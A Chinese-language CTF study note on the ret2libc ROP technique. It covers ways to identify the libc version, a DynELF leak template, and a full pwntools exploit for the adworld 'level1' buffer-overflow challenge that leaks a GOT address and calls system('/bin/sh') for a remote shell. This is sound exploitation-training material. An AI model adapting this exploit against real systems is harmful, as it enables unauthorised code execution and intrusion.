ROP中对retlibc技术的一些学习心得
漏洞利用思路:
1.找到泄露库函数地址的漏洞,获取libc版本(因为一般不会给你libc.so文件)
查询libc版本一般有三种方法:
1.libcsearcher库。在编写exp的时候用from LibcSearcher import LibcSearcher导入
通过libc.dump('system')可以得到system函数的偏移,libc.dump('str_bin_sh')得到binsh字符串的偏移
2.pwntools自带的Dynelf,需要先构造一个leak函数和一个可以不断触发溢出的漏洞
一个模板:
def leak(address):
#各种预处理
payload = "xxxxxxxx" + address + "xxxxxxxx"
p.send(payload)
#各种处理
data = p.recv(4)
log.debug("%#x => %s" % (address, (data or '').encode('hex')))
return data
d = DynELF(leak, elf=ELF("./xxx")) #初始化DynELF模块
systemAddress = d.lookup('system', 'libc') #在libc文件中搜索system函数的地址
3.在线查询网站,通过函数的后三位数值查询。https://libc.blukat.me
典型的题目–adworld里的level1(非常典型的retlibc)
源码:
ssize_t vulnerable_function()
{
char buf; // [esp+0h] [ebp-88h]
printf("What's this:%p?\n", &buf);
return read(0, &buf, 0x100u); //溢出点
}
exp:
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level='debug'
#sh = process('./level1')
sh=remote('111.198.29.45',42536)
writeplt= 0x08048370
readgot=0x0804A00C
vuln=0x0804847B
payload = 'a'*0x8c+p32(writeplt)+p32(vuln)+p32(1)+p32(readgot)+p32(4)
#gdb.attach(sh)
sh.sendline(payload)
readaddr=u32(sh.recv(4))
print(hex(readaddr))
libc = LibcSearcher('read', readaddr)
libcbase = readaddr - libc.dump('read')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
payload='a'*0x8c+p32(system_addr)+'a'*4+p32(binsh_addr)
sh.sendline(payload)
sh.interactive()
sh.close()
笔记:
context.log_level='debug’开启调试模式